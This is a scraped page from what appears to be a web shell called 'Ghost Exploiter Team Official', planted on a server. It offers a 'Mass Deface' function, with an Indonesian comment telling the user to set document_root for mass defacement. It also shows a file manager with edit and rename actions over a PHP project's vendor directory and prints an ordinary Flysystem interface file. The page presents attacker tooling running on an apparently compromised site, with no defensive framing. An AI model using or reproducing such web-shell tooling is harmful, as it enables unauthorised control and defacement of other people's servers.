Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
league
/
flysystem
/
src
/
UrlGeneration
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ChainedPublicUrlGenerat
...
0.729KB
edt
ren
PrefixPublicUrlGenerato
...
0.487KB
edt
ren
PublicUrlGenerator.php
0.306KB
edt
ren
ShardedPrefixPublicUrlG
...
0.934KB
edt
ren
TemporaryUrlGenerator.php
0.368KB
edt
ren
<?php declare(strict_types=1); namespace League\Flysystem\UrlGeneration; use DateTimeInterface; use League\Flysystem\Config; use League\Flysystem\UnableToGenerateTemporaryUrl; interface TemporaryUrlGenerator { /** * @throws UnableToGenerateTemporaryUrl */ public function temporaryUrl(string $path, DateTimeInterface $expiresAt, Config $config): string; }